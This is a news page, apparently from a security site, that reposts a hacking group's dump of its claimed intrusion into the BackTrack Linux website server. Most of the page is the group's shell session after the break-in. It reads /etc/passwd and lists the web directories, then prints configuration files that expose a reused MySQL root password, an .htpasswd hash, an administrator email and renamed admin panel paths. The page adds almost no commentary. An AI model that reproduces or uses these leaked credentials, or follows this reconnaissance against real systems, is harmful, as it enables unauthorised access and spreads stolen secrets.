The Hacker News Logo
Subscribe to Newsletter

Wow ! Backtrack Official Website's Server Hacked By Team Injector (1337db) !

Wow ! Backtrack Official Website's Server Hacked By Team Injector !



Attack on backtrack-linux.org From 1337 Team Injector


  .    .--.   .--.   .---.      .          
.'|        )      )      /      |          
  |     --:    --:      /    .-.| .-.  .  .
  |        )      )    /    (   |(   ) |  |
'---'  `--'   `--'    '      `-'`-`-'`-`--|
                                          ;
                                       `-' 






Since we already tapped into exploit-db and their server lies  in  the
same subnet  with  backtrack,  we  decided  to  check  out  their  mad
security. Backtrack is run by muts, the same guy who also  administers
exploit-db, so no wonder why it was super easy to get a shell...      




$ uname -a
Linux backtrack-linux.org 2.6.32.26-175.fc12.x86_64 #1 SMP Wed Dec 1 21:39:34 UTC 2010 x86_64 x86_64 x86_64 GNU/Linux


$ id
uid=48(apache) gid=494(apache) groups=494(apache) context=unconfined_u:system_r:httpd_t:s0


$ alias ls="ls -la"


$ ls
total 110
dr-xr-xr-x.  25 root root  4096 Dec  7 08:42 .
dr-xr-xr-x.  25 root root  4096 Dec  7 08:42 ..
-rw-r--r--.   1 root root     0 Dec  7 08:42 .autofsck
drwx------.   2 root root  4096 Dec 10 03:40 backup
dr-xr-xr-x.   2 root root  4096 Nov 29 19:59 bin
dr-xr-xr-x.   5 root root  1024 Dec  7 08:41 boot
drwxr-xr-x.  17 root root  3580 Dec  7 08:43 dev
drwxr-xr-x.  66 root root  4096 Dec  7 08:42 etc
drwxr-xr-x.   3 root root  4096 Aug 14 20:50 home
dr-xr-xr-x.   9 root root  4096 Aug 11 04:01 lib
dr-xr-xr-x.   9 root root 12288 Nov 29 20:00 lib64
drwx------.   2 root root 16384 Aug 11 02:01 lost+found
drwxr-xr-x.   2 root root  4096 Aug 11 04:42 maint
drwxr-xr-x.   2 root root  4096 Aug 25  2009 media
drwxr-xr-x.   2 root root  4096 Aug 25  2009 mnt
drwxr-xr-x.   2 root root  4096 Aug 25  2009 opt
dr-xr-xr-x. 160 root root     0 Dec  7 08:42 proc
drwxr-xr-x.   5 root root  4096 Dec  3 17:16 recovery
dr-xr-x---.   4 root root  4096 Dec 10 08:50 root
dr-xr-xr-x.   2 root root 12288 Nov 29 19:59 sbin
drwxr-xr-x.   7 root root     0 Dec  7 08:42 selinux
drwxr-xr-x.   2 root root  4096 Aug 25  2009 srv
drwxr-xr-x.  13 root root     0 Dec  7 08:42 sys
drwxrwxrwt.   4 root root  4096 Dec 10 14:08 tmp
drwxr-xr-x.  14 root root  4096 Aug 11 02:03 usr
drwxr-xr-x.  20 root root  4096 Aug 14 20:45 var




$ cat /etc/issue
Fedora release 12 (Constantine)
Kernel \r on an \m (\l)


$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:499:virtual console memory owner:/dev:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
mailnull:x:47:497::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:496::/var/spool/mqueue:/sbin/nologin
sshd:x:74:495:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
apache:x:48:494:Apache:/var/www:/sbin/nologin
mysql:x:27:493:MySQL Server:/var/lib/mysql:/bin/bash
ossec:x:500:500::/var/ossec:/sbin/nologin
ossecm:x:501:500::/var/ossec:/sbin/nologin
ossecr:x:502:500::/var/ossec:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin


$ cd
/var/www/html/


$ ls
total 90224
drwxr-xr-x. 13 apache apache     4096 Dec  9 12:21 .
drwxr-xr-x.  6 root   root       4096 Aug 18 10:30 ..
-rw-r--r--.  1 apache apache     4183 Dec  5 16:50 .htaccess
-rw-r--r--.  1 apache apache     1156 Aug 11 03:17 HT
-rw-r--r--.  1 apache apache     2233 Aug 11 03:17 HT-ORIG
-rw-r--r--.  1 apache apache  1526525 Nov 11 14:01 IMG_0585.JPG
drwxr-xr-x.  2 apache apache     4096 Aug 11 03:16 ads
-rw-r--r--.  1 apache apache   125832 Nov 19 12:18 bootsplash.jpg
-rw-r--r--.  1 apache apache   754444 Aug 11 03:16 bt-nsa.png
-rw-r--r--.  1 apache apache   757498 Aug 11 03:16 bt-nsa2.png
-rw-r--r--.  1 apache apache    81597 Aug 11 03:16 bt4-final-vm.zip.torrent
-rw-r--r--.  1 apache apache    60094 Aug 11 03:16 bt4-final.iso.torrent
-rw-r--r--.  1 apache apache       44 Aug 11 03:16 bt4r1.txt
-rw-r--r--.  1 root   root     686248 Nov 23 10:47 bt4r2.png
-rw-r--r--.  1 apache apache   160728 Aug 11 03:16 btfail.png
-rw-r--r--.  1 apache apache      476 Aug 11 03:16 collapsible_ad.html
-rwxr-xr-x.  1 apache apache 13397784 Aug 11 03:16 d.bin
-rw-r--r--.  1 apache apache      121 Aug 11 03:16 d.lic
-rw-r--r--.  1 apache apache 12844822 Aug 11 03:16 d32.bin
drwxr-xr-x.  2 apache apache     4096 Aug 11 03:16 documents
-rw-r--r--.  1 apache apache     3342 Aug 11 03:16 down.php
-rw-r--r--.  1 apache apache     4158 Aug 11 03:16 download-orig.php
-rw-r--r--.  1 apache apache     4945 Nov 22 11:38 download.php
-rw-r--r--.  1 apache apache    15125 Aug 11 03:16 error.php
-rw-r--r--.  1 apache apache   137383 Aug 11 03:16 example-2.jpg
-rw-r--r--.  1 apache apache     1150 Aug 11 03:16 favicon.ico
drwxr-xr-x. 21 apache apache     4096 Nov 22 18:56 forums
-rw-r--r--.  1 apache apache    87176 Aug 11 03:17 google.png
-rw-r--r--.  1 apache apache       53 Aug 11 03:17 googled6c4817aa45e0032.html
-rw-r--r--.  1 apache apache       23 Aug 11 03:17 googlehostedservice.html
-rw-r--r--.  1 apache apache  1978856 Sep 17 08:06 hola.jpg
-rw-r--r--.  1 apache apache  2264271 Sep 17 08:12 hola1.jpg
-rw-r--r--.  1 apache apache  2197361 Sep 17 08:15 hola2.jpg
-rw-r--r--.  1 apache apache   315306 Aug 11 03:17 hola22.png
-rw-r--r--.  1 apache apache   169202 Aug 11 03:17 hola23.png
drwxr-xr-x.  8 apache apache     4096 Nov 21 16:38 images
-rw-r--r--.  1 apache apache        3 Aug 11 03:17 index.html
-rw-r--r--.  1 apache apache      397 Dec  9 12:20 index.php
-rw-r--r--.  1 apache apache   321196 Nov 19 15:06 kanji.png
-rw-r--r--.  1 apache apache   147841 Sep  4 12:37 knock-0.5.tar.gz
-rw-r--r--.  1 apache apache    15410 Dec  9 12:20 license.txt
-rw-r--r--.  1 apache apache 48404480 Nov 14 15:53 mediawiki-1.16.0.tar
-rw-r--r--.  1 apache apache    13946 Aug 11 03:17 nv-xorg.conf
-rw-r--r--.  1 apache apache  1382400 Oct 26 10:38 oiopub-direct.tar
-rw-r--r--.  1 apache apache  1508471 Aug 11 03:17 p2270016.jpg
-rw-r--r--.  1 apache apache  1636957 Aug 11 03:17 p2280018.jpg
drwxr-xr-x.  2 apache apache     4096 Nov 22 11:46 patches
-rw-r--r--.  1 apache apache      582 Nov 22 11:21 r2.php
-rw-r--r--.  1 apache apache     9120 Dec  9 12:20 readme.html
-rw-r--r--.  1 apache apache      712 Nov 10 22:27 s.php
-rw-r--r--.  1 apache apache       63 Aug 11 03:17 show.dud.php
-rw-r--r--.  1 apache apache      801 Aug 11 03:17 show.original.php
-rw-r--r--.  1 apache apache       31 Aug 11 03:17 show.php
-rw-r--r--.  1 apache apache      601 Nov 10 22:28 show.stats.working.php
-rw-r--r--.  1 apache apache    38971 Dec  7 23:23 sitemap.xml
-rw-r--r--.  1 apache apache     2485 Dec  7 23:23 sitemap.xml.gz
drwxr-xr-x.  3 apache apache     4096 Aug 11 03:17 slider
-rw-r--r--.  1 apache apache   714372 Aug 11 03:17 spot-the-release.png
-rw-r--r--.  1 apache apache     1536 Aug 11 03:17 stats.php
-rw-r--r--.  1 apache apache       33 Dec 10 03:34 stats.txt
-rw-r--r--.  1 apache apache    23660 Aug 11 03:17 style.css
-rw-r--r--.  1 apache apache        5 Aug 11 03:17 test.php
drwxr-xr-x.  2 apache apache     4096 Nov 22 09:22 torrents
drwxr-xr-x. 15 apache apache     4096 Nov 27 16:52 wiki
-rw-r--r--.  1 apache apache     4391 Dec  9 12:20 wp-activate.php
drwxr-xr-x.  8 apache apache     4096 Dec  5 08:12 wp-admin
-rw-r--r--.  1 apache apache    40284 Dec  9 12:20 wp-app.php
-rw-r--r--.  1 apache apache      220 Dec  9 12:20 wp-atom.php
-rw-r--r--.  1 apache apache      274 Dec  9 12:20 wp-blog-header.php
-rw-r--r--.  1 apache apache     3926 Dec  9 12:20 wp-comments-post.php
-rw-r--r--.  1 apache apache      238 Dec  9 12:20 wp-commentsrss2.php
-rw-r--r--.  1 apache apache     3173 Dec  9 12:20 wp-config-sample.php
-rw-r--r--.  1 apache apache     2696 Nov 22 19:32 wp-config.php
drwxr-xr-x.  9 apache apache     4096 Dec  9 12:21 wp-content
-rw-r--r--.  1 apache apache     1255 Dec  9 12:20 wp-cron.php
-rw-r--r--.  1 apache apache      240 Dec  9 12:20 wp-feed.php
drwxr-xr-x.  8 apache apache     4096 Aug 13 20:06 wp-includes
-rw-r--r--.  1 apache apache     2002 Dec  9 12:20 wp-links-opml.php
-rw-r--r--.  1 apache apache     2441 Dec  9 12:20 wp-load.php
-rw-r--r--.  1 apache apache    26059 Dec  9 12:20 wp-login.php
-rw-r--r--.  1 apache apache     7774 Dec  9 12:20 wp-mail.php
-rw-r--r--.  1 apache apache      487 Dec  9 12:20 wp-pass.php
-rw-r--r--.  1 apache apache      218 Dec  9 12:20 wp-rdf.php
-rw-r--r--.  1 apache apache      316 Dec  9 12:20 wp-register.php
-rw-r--r--.  1 apache apache      218 Dec  9 12:20 wp-rss.php
-rw-r--r--.  1 apache apache      220 Dec  9 12:20 wp-rss2.php
-rw-r--r--.  1 apache apache     9177 Dec  9 12:20 wp-settings.php
-rw-r--r--.  1 apache apache    18695 Dec  9 12:20 wp-signup.php
-rw-r--r--.  1 apache apache     3702 Dec  9 12:20 wp-trackback.php
-rw-r--r--.  1 root   root      99665 Nov 24 00:52 wtfff.png
-rw-r--r--.  1 apache apache       85 Nov 20 13:43 x.gif
-rw-r--r--.  1 apache apache    95481 Dec  9 12:20 xmlrpc.php


$ cat wp-config.php
<?php
/** Enable W3 Total Cache **/
define('WP_CACHE', true); // Added by W3 Total Cache


/**
 * The base configurations of the WordPress.
 *
 * This file has the following configurations: MySQL settings, Table Prefix,
 * Secret Keys, WordPress Language, and ABSPATH. You can find more information by
 * visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing
 * wp-config.php} Codex page. You can get the MySQL settings from your web host.
 *
 * This file is used by the wp-config.php creation script during the
 * installation. You don't have to use the web site, you can just copy this file
 * to "wp-config.php" and fill in the values.
 *
 * @package WordPress
 */


// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'blog');


/** MySQL database username */
define('DB_USER', 'root');


/** MySQL database password */
define('DB_PASSWORD', '234hi2u3d98as7d23kuh');


/** MySQL hostname */
define('DB_HOST', 'localhost');


/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');


/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');


/**#@+
 * Authentication Unique Keys.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY', 'put your unique phrase here');
define('SECURE_AUTH_KEY', 'put your unique phrase here');
define('LOGGED_IN_KEY', 'put your unique phrase here');
define('NONCE_KEY', 'put your unique phrase here');
/**#@-*/


/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each a unique
 * prefix. Only numbers, letters, and underscores please!
 */
$table_prefix  = 'wp_';


/**
 * WordPress Localized Language, defaults to English.
 *
 * Change this to localize WordPress.  A corresponding MO file for the chosen
 * language must be installed to wp-content/languages. For example, install
 * de.mo to wp-content/languages and set WPLANG to 'de' to enable German
 * language support.
 */
define ('WPLANG', '');


/* That's all, stop editing! Happy blogging. */


/** WordPress absolute path to the Wordpress directory. */
if ( !defined('ABSPATH') )
        define('ABSPATH', dirname(__FILE__) . '/');


/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');


$ cat show.php
<?php
include 'stats.txt';
?>
$ cat stats.txt
BackTrack 4 - 4916323 downloads


cat download.php
<?php


// DO NOT CHANGE THIS FILE WITHOUT TALKING TO MUTS FIRST> EVEN IF YOU THINK YOU KNOW WHAT YOU ARE DOING!!!


function getRealIpAddr()
{
    if (!empty($_SERVER['HTTP_CLIENT_IP']))   //check ip from share internet
    {
      $ip=$_SERVER['HTTP_CLIENT_IP'];
    }
    elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR']))   //to check ip is pass from proxy
    {
      $ip=$_SERVER['HTTP_X_FORWARDED_FOR'];
    }
    else
    {
      $ip=$_SERVER['REMOTE_ADDR'];
    }
    return $ip;
}


$ip=getRealIpAddr();


$username="root";
$password="234hi2u3d98as7d23kuh";
$database="counter";


function choose($iso)
{


 $num = Rand (1,5);
 switch ($num)
 {
  case 1:
  $link="ftp://ftp.uio.no/pub/security/backtrack/$iso";
  break;


  case 2:
  $link="http://ftp.uio.no/pub/security/backtrack/$iso";
  break;


  case 3:
  $link="http://ftp.halifax.rwth-aachen.de/backtrack/$iso";
                break;


  case 4:
  $link="http://ftp.halifax.rwth-aachen.de/backtrack/$iso";
                break;


  case 5:
  $link="http://ftp.halifax.rwth-aachen.de/backtrack/$iso";
                break;


//  case 6:
//  $link="http://moon.backtrack-linux.org/downloads/$iso";
//  break;




 }




return $link;


}




$version=$_GET["fname"];


if (! (($version=="bt4f") or ($version=="bt4fvm") or ($version=="bt4r1") or ($version=="bt4r1vm") or ($version=="bt3") or ($version=="bt4pf") or ($version=="bt4b") or ($version=="bt4bvm") or ($version=="bt4r2") or ($version=="bt4r2vm")))


{
 echo "This page cannot be accessed directly.";
 exit;
}


if ($version=="bt4r2")
{


        $iso="bt4-r2.iso";
        $link=choose($iso);


mysql_connect("localhost",$username,$password);
@mysql_select_db($database) or die( "Unable to select database");
$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
mysql_query($query);
mysql_close();


        header( "Location: $link ");
        exit;
}




if ($version=="bt4r2vm")
{


        $iso="bt4-r2-vm.tar.bz2";
        $link=choose($iso);


mysql_connect("localhost",$username,$password);
@mysql_select_db($database) or die( "Unable to select database");
$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
mysql_query($query);
mysql_close();


        header( "Location: $link ");
        exit;
}






if ($version=="bt4f")
{


 $iso="bt4-final.iso";
 $link=choose($iso);


mysql_connect("localhost",$username,$password);
@mysql_select_db($database) or die( "Unable to select database");
$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
mysql_query($query);
mysql_close();


 header( "Location: $link ");
 exit;
}


elseif ($version=="bt4fvm")
{
 $iso="bt4-final-vm.zip";
 $link=choose($iso);


mysql_connect("localhost",$username,$password);
@mysql_select_db($database) or die( "Unable to select database");
$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
mysql_query($query);
mysql_close();


 header( "Location: $link ");
 exit;
}


elseif ($version=="bt4r1")
{
 $iso="bt4-r1.iso";
 $link=choose($iso);


mysql_connect("localhost",$username,$password);
@mysql_select_db($database) or die( "Unable to select database");
$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
mysql_query($query);
mysql_close();


 header( "Location: $link ");
 exit;
}


elseif ($version=="bt4r1vm")
{
 $iso="bt4-r1-vm.tar.bz2";
 $link=choose($iso);


mysql_connect("localhost",$username,$password);
@mysql_select_db($database) or die( "Unable to select database");
$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
mysql_query($query);
mysql_close();


 header( "Location: $link ");
 exit;
}


elseif ($version=="bt4pf")
{
 $iso="bt4-pre-final.iso";
 $link=choose($iso);


mysql_connect("localhost",$username,$password);
@mysql_select_db($database) or die( "Unable to select database");
$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
mysql_query($query);
mysql_close();


 header( "Location: $link ");
 exit;
}


elseif ($version=="bt4b")
{
 $iso="bt4-beta.iso";
 $link=choose($iso);
mysql_connect("localhost",$username,$password);
@mysql_select_db($database) or die( "Unable to select database");
$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
mysql_query($query);
mysql_close();
 header( "Location: $link ");
 exit;
}


elseif ($version=="bt4bvm")
{
 $iso="bt4-beta-vm-6.5.1.rar";
 $link=choose($iso);
mysql_connect("localhost",$username,$password);
@mysql_select_db($database) or die( "Unable to select database");
$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
mysql_query($query);
mysql_close();
 header( "Location: $link ");
 exit;
}


elseif ($version=="bt3")
{
 $iso="bt3-final.iso";
 $link=choose($iso);
mysql_connect("localhost",$username,$password);
@mysql_select_db($database) or die( "Unable to select database");
$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
mysql_query($query);
mysql_close();
 header( "Location: $link ");
 exit;
}


else
{
 exit;
}


?>




$ cat s.php
<?php




$username="root";
$password="234hi2u3d98as7d23kuh";
$database="counter";






mysql_connect("localhost",$username,$password);
@mysql_select_db($database) or die( "Unable to select database");
$query = "select count(DISTINCT ip) as numrows from downloadz where version=\"bt4f\"";
$query2 = "select count(DISTINCT ip) as numrows from downloadz where version=\"bt4fvm\"";
$result=mysql_query($query);
$result2=mysql_query($query2);
$row2 = mysql_fetch_array($result2, MYSQL_ASSOC);
$row = mysql_fetch_array($result, MYSQL_ASSOC);
$numrows1 = $row['numrows'];
$numrows2 = $row2['numrows'];
mysql_close();


$total= round(($numrows1 + $numrows2) * 1.4);


echo "BackTrack 4 Final - $total unique downloads";


?>


$ cd wiki


$ ls


total 700
drwxr-xr-x. 15 apache apache   4096 Nov 27 16:52 .
drwxr-xr-x. 13 apache apache   4096 Dec  9 12:21 ..
-rw-r--r--.  1 apache apache     23 Nov 14 16:01 .htpasswd
-rw-r--r--.  1 apache apache  17997 Apr  5  2006 COPYING
-rw-r--r--.  1 apache apache   2073 Jul 27 07:29 CREDITS
-rw-r--r--.  1 apache apache     76 Jul 27  2009 FAQ
-rw-r--r--.  1 apache apache 392287 Mar 12  2010 HISTORY
-rw-r--r--.  1 apache apache     96 Nov 14 16:01 HT
-rw-r--r--.  1 apache apache   4138 Apr 18  2008 INSTALL
-rw-r--r--.  1 apache apache   5469 Nov 28 16:45 LocalSettings.php
-rw-r--r--.  1 apache apache   3649 Nov 11  2008 README
-rw-r--r--.  1 apache apache  58431 Jul 28 03:11 RELEASE-NOTES
-rw-r--r--.  1 apache apache    648 May  7  2009 StartProfiler.sample
-rw-r--r--.  1 apache apache  13307 Mar 25  2010 UPGRADE
drwxr-xr-x.  2 root   root     4096 Nov 27 16:53 adsense
-rw-r--r--.  1 apache apache   4707 Feb 15  2010 api.php
-rw-r--r--.  1 apache apache     25 Feb  3  2008 api.php5
drwxr-xr-x.  2 apache apache   4096 Jul 28 03:16 bin
-rw-r--r--.  1 apache apache   8436 Nov 21 14:24 bt-wiki.png
drwxr-xr-x.  2 apache apache   4096 Jul 28 03:16 cache
drwxr-xr-x.  2 apache apache   4096 Nov 14 15:58 config
drwxr-xr-x.  4 apache apache   4096 Jul 28 03:16 docs
drwxr-xr-x.  4 apache apache   4096 Nov 28 16:44 extensions
drwxr-xr-x. 12 apache apache   4096 Nov 23 12:36 images
-rw-r--r--.  1 apache apache   4031 Oct 14  2009 img_auth.php
-rw-r--r--.  1 apache apache     31 Feb  3  2008 img_auth.php5
drwxr-xr-x. 16 apache apache   4096 Jul 28 03:16 includes
-rw-r--r--.  1 apache apache   4329 Jan  1  2010 index.php
-rw-r--r--.  1 apache apache     28 Feb  3  2008 index.php5
drwxr-xr-x.  4 apache apache   4096 Jul 28 03:16 languages
drwxr-xr-x. 13 apache apache  12288 Nov 22 12:55 maintenance
drwxr-xr-x.  2 apache apache   4096 Jul 28 03:16 math
-rw-r--r--.  1 apache apache   3054 Mar 21  2009 opensearch_desc.php
-rw-r--r--.  1 apache apache     39 Mar  3  2008 opensearch_desc.php5
-rw-r--r--.  1 apache apache    174 Feb  3  2010 php5.php5
-rw-r--r--.  1 apache apache   8821 Jul 27 03:40 profileinfo.php
-rw-r--r--.  1 apache apache    383 Mar 21  2009 redirect.php
-rw-r--r--.  1 apache apache     31 Feb  3  2008 redirect.php5
-rw-r--r--.  1 apache apache     89 Feb  3  2010 redirect.phtml
drwxr-xr-x.  2 apache apache   4096 Jul 28 03:16 serialized
-rwxrwxrwx.  1 root   root     6816 Nov 23 18:29 sitemap.xml
drwxr-xr-x.  9 apache apache   4096 Nov 28 14:12 skins
-rw-r--r--.  1 apache apache   4905 Mar  8  2010 thumb.php
-rw-r--r--.  1 apache apache     29 Feb  3  2008 thumb.php5
-rw-r--r--.  1 apache apache   1347 Nov  5  2008 trackback.php
-rw-r--r--.  1 apache apache     32 Mar 16  2009 trackback.php5
-rw-r--r--.  1 apache apache     86 Feb  3  2010 wiki.phtml


$ cat .htpasswd
edbadmin:YE8mle4nG1Z.c


cd ..
cat forums/includes/config.php
<?php
/*======================================================================*\
|| #################################################################### ||
|| # vBulletin 4.0.0 Patch Level 1
|| # ---------------------------------------------------------------- # ||
|| # All PHP code in this file is ©2000-2010 vBulletin Solutions Inc. # ||
|| # This file may not be redistributed in whole or significant part. # ||
|| # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # ||
|| # http://www.vbulletin.com | http://www.vbulletin.com/license.html # ||
|| #################################################################### ||
\*======================================================================*/


/*-------------------------------------------------------*\
| ****** NOTE REGARDING THE VARIABLES IN THIS FILE ****** |
+---------------------------------------------------------+
| If you get any errors while attempting to connect to    |
| MySQL, you will need to email your webhost because we   |
| cannot tell you the correct values for the variables    |
| in this file.                                           |
\*-------------------------------------------------------*/


 // ****** DATABASE TYPE ******
 // This is the type of the database server on which your vBulletin database will be located.
 // Valid options are mysql and mysqli, for slave support add _slave.  Try to use mysqli if you are using PHP 5 and MySQL 4.1+
 // for slave options just append _slave to your preferred database type.
$config['Database']['dbtype'] = 'mysql';


 // ****** DATABASE NAME ******
 // This is the name of the database where your vBulletin will be located.
 // This must be created by your webhost.
$config['Database']['dbname'] = 'forums';


 // ****** TABLE PREFIX ******
 // Prefix that your vBulletin tables have in the database.
$config['Database']['tableprefix'] = '';


 // ****** TECHNICAL EMAIL ADDRESS ******
 // If any database errors occur, they will be emailed to the address specified here.
 // Leave this blank to not send any emails when there is a database error.
$config['Database']['technicalemail'] = 'muts@offsec.com';


 // ****** FORCE EMPTY SQL MODE ******
 // New versions of MySQL (4.1+) have introduced some behaviors that are
 // incompatible with vBulletin. Setting this value to "true" disables those
 // behaviors. You only need to modify this value if vBulletin recommends it.
$config['Database']['force_sql_mode'] = false;






 // ****** MASTER DATABASE SERVER NAME AND PORT ******
 // This is the hostname or IP address and port of the database server.
 // If you are unsure of what to put here, leave the default values.
$config['MasterServer']['servername'] = 'localhost';
$config['MasterServer']['port'] = 3306;


 // ****** MASTER DATABASE USERNAME & PASSWORD ******
 // This is the username and password you use to access MySQL.
 // These must be obtained through your webhost.
$config['MasterServer']['username'] = 'root';
$config['MasterServer']['password'] = '234hi2u3d98as7d23kuh';


 // ****** MASTER DATABASE PERSISTENT CONNECTIONS ******
 // This option allows you to turn persistent connections to MySQL on or off.
 // The difference in performance is negligible for all but the largest boards.
 // If you are unsure what this should be, leave it off. (0 = off; 1 = on)
$config['MasterServer']['usepconnect'] = 0;






 // ****** SLAVE DATABASE CONFIGURATION ******
 // If you have multiple database backends, this is the information for your slave
 // server. If you are not 100% sure you need to fill in this information,
 // do not change any of the values here.
$config['SlaveServer']['servername'] = '';
$config['SlaveServer']['port'] = 3306;
$config['SlaveServer']['username'] = '';
$config['SlaveServer']['password'] = '';
$config['SlaveServer']['usepconnect'] = 0;






 // ****** PATH TO ADMIN & MODERATOR CONTROL PANELS ******
 // This setting allows you to change the name of the folders that the admin and
 // moderator control panels reside in. You may wish to do this for security purposes.
 // Please note that if you change the name of the directory here, you will still need
 // to manually change the name of the directory on the server.
$config['Misc']['admincpdir'] = 'admincphaha';
$config['Misc']['modcpdir'] = 'modcphaha';


 // Prefix that all vBulletin cookies will have
 // Keep this short and only use numbers and letters, i.e. 1-9 and a-Z
$config['Misc']['cookieprefix'] = 'bb';


 // ******** FULL PATH TO FORUMS DIRECTORY ******
 // On a few systems it may be necessary to input the full path to your forums directory
 // for vBulletin to function normally. You can ignore this setting unless vBulletin
 // tells you to fill this in. Do not include a trailing slash!
 // Example Unix:
 //   $config['Misc']['forumpath'] = '/home/users/public_html/forums';
 // Example Win32:
 //   $config['Misc']['forumpath'] = 'c:\program files\apache group\apache\htdocs\vb3';
$config['Misc']['forumpath'] = '';






 // ****** USERS WITH ADMIN LOG VIEWING PERMISSIONS ******
 // The users specified here will be allowed to view the admin log in the control panel.
 // Users must be specified by *ID number* here. To obtain a user's ID number,
 // view their profile via the control panel. If this is a new installation, leave
 // the first user created will have a user ID of 1. Seperate each userid with a comma.
$config['SpecialUsers']['canviewadminlog'] = '1';


 // ****** USERS WITH ADMIN LOG PRUNING PERMISSIONS ******
 // The users specified here will be allowed to remove ("prune") entries from the admin
 // log. See the above entry for more information on the format.
$config['SpecialUsers']['canpruneadminlog'] = '1';


 // ****** USERS WITH QUERY RUNNING PERMISSIONS ******
 // The users specified here will be allowed to run queries from the control panel.
 // See the above entries for more information on the format.
 // Please note that the ability to run queries is quite powerful. You may wish
 // to remove all user IDs from this list for security reasons.
$config['SpecialUsers']['canrunqueries'] = '';


 // ****** UNDELETABLE / UNALTERABLE USERS ******
 // The users specified here will not be deletable or alterable from the control panel by any users.
 // To specify more than one user, separate userids with commas.
$config['SpecialUsers']['undeletableusers'] = '';


 // ****** SUPER ADMINISTRATORS ******
 // The users specified below will have permission to access the administrator permissions
 // page, which controls the permissions of other administrators
$config['SpecialUsers']['superadministrators'] = '1,2';


 // ****** DATASTORE CACHE CONFIGURATION *****
 // Here you can configure different methods for caching datastore items.
 // vB_Datastore_Filecache  - to use includes/datastore/datastore_cache.php
 // vB_Datastore_APC - to use APC
 // vB_Datastore_XCache - to use XCache
 // vB_Datastore_Memcached - to use a Memcache server, more configuration below
// $config['Datastore']['class'] = 'vB_Datastore_Filecache';


 // ******** DATASTORE PREFIX ******
 // If you are using a PHP Caching system (APC, XCache, eAccelerator) with more
 // than one set of forums installed on your host, you *may* need to use a prefix
 // so that they do not try to use the same variable within the cache.
 // This works in a similar manner to the database table prefix.
// $config['Datastore']['prefix'] = '';


 // It is also necessary to specify the hostname or IP address and the port the server is listening on
/*
$config['Datastore']['class'] = 'vB_Datastore_Memcached';
$i = 0;
// First Server
$i++;
$config['Misc']['memcacheserver'][$i]   = '127.0.0.1';
$config['Misc']['memcacheport'][$i]      = 11211;
$config['Misc']['memcachepersistent'][$i] = true;
$config['Misc']['memcacheweight'][$i]   = 1;
$config['Misc']['memcachetimeout'][$i]   = 1;
$config['Misc']['memcacheretry_interval'][$i] = 15;
*/


// ****** The following options are only needed in special cases ******


 // ****** MySQLI OPTIONS *****
 // When using MySQL 4.1+, MySQLi should be used to connect to the database.
 // If you need to set the default connection charset because your database
 // is using a charset other than latin1, you can set the charset here.
 // If you don't set the charset to be the same as your database, you
 // may receive collation errors.  Ignore this setting unless you
 // are sure you need to use it.
// $config['Mysqli']['charset'] = 'utf8';


 // Optionally, PHP can be instructed to set connection parameters by reading from the
 // file named in 'ini_file'. Please use a full path to the file.
 // Example:
 // $config['Mysqli']['ini_file'] = 'c:\program files\MySQL\MySQL Server 4.1\my.ini';
$config['Mysqli']['ini_file'] = '';


// Image Processing Options
 // Images that exceed either dimension below will not be resized by vBulletin. If you need to resize larger images, alter these settings.
$config['Misc']['maxwidth'] = 2592;
$config['Misc']['maxheight'] = 1944;


/*======================================================================*\
|| ####################################################################
|| # Downloaded: 22:25, Sat Jan 9th 2010
|| # CVS: $RCSfile$ - $Revision: 32878 $
|| ####################################################################
\*======================================================================*/


happY 1337day ;)
Have something to say about this article? Comment below or share it with us on Facebook, Twitter or our LinkedIn Group.
SHARE
Comments
Latest Stories
Best Deals

Newsletter — Subscribe for Free

Join over 500,000 information security professionals — Get the best of our cyber security coverage delivered to your inbox every morning.